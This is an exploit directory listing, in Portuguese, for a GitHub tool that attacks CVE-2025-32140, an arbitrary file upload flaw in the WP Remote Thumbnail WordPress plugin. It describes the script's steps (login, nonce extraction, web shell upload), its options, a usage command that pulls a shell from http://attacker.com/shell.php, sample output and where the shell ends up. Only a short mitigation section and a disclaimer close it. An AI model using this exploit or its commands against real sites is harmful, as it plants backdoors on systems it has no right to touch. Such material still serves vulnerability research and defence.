Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 é vulnerável a Arbitrary File Upload | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-32140
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 é vulnerável a Arbitrary File Upload

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-32140 – Exploração do WP Remote Thumbnail (Upload Arbitrário de Arquivos)


📝 Descrição

CVE-2025-32140 é uma vulnerabilidade crítica no plugin WP Remote Thumbnail para WordPress. Ela permite que atacantes autenticados (com permissões de contributor ou superiores) façam upload de arquivos arbitrários, como web shells, abusando de uma funcionalidade falha que aceita URLs não sanitizadas.

O plugin não valida o tipo ou conteúdo do arquivo obtido da URL remote_thumb fornecida. Isso permite que atacantes salvem arquivos PHP maliciosos (ex.: backdoors) no diretório /wp-content/uploads.


⚠️ Componente Vulnerável

  • Plugin: WP Remote Thumbnail
  • Versões Vulneráveis: <= 1.3.2
  • Versão Corrigida: Ainda não lançada
  • Vetor de Ataque: Rede
  • Privilégios Necessários: Baixo (Usuário autenticado com capacidade edit_post)
  • Pontuação CVSS: 9.9 (Crítica)

🛠 Script de Exploração

Este script Python automatiza a exploração do CVE-2025-32140, executando os seguintes passos:

  1. Faz login no site WordPress alvo.
  2. Extrai automaticamente os nonces necessários.
  3. Cria e envia uma requisição maliciosa através do parâmetro remote_thumb.
  4. Envia um web shell para o site alvo.

🔧 Opções de Linha de Comando

OpçãoAliasDescrição
--url-uURL do site WordPress alvo (ex.: http://target.com/wordpress)
--username-unNome de usuário WordPress com privilégios de edição de posts
--password-pSenha para o nome de usuário especificado
--user_ID-uidID do usuário WordPress (geralmente 1 para admin)
--post_ID-pidID do post a ser editado (pode ser um rascunho)
--shellURL direta de um web shell PHP hospedado no servidor do atacante

🚀 Uso

python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 Uso e Ajuda


                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 Exemplo de Saída

[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 Localização do Shell

Uma vez explorado, o web shell enviado provavelmente será armazenado em:

http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

Substitua YYYY/MM pelo ano e mês atuais do upload.


🛡 Recomendações

Para mitigar o risco representado por esta vulnerabilidade:

  1. Atualize o plugin para a versão mais recente (assim que uma correção for lançada).
  2. Restrinja as capacidades de upload de arquivos para usuários confiáveis apenas.
  3. Desabilite a funcionalidade de busca de thumbnail remota se não for necessária.

⚠️ Aviso Legal

Este script é fornecido apenas para fins educacionais.
O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta exploração.


👤 Autor

Por: Nxploited ( Khaled Alenazi ) 🌟

Baixar ferramenta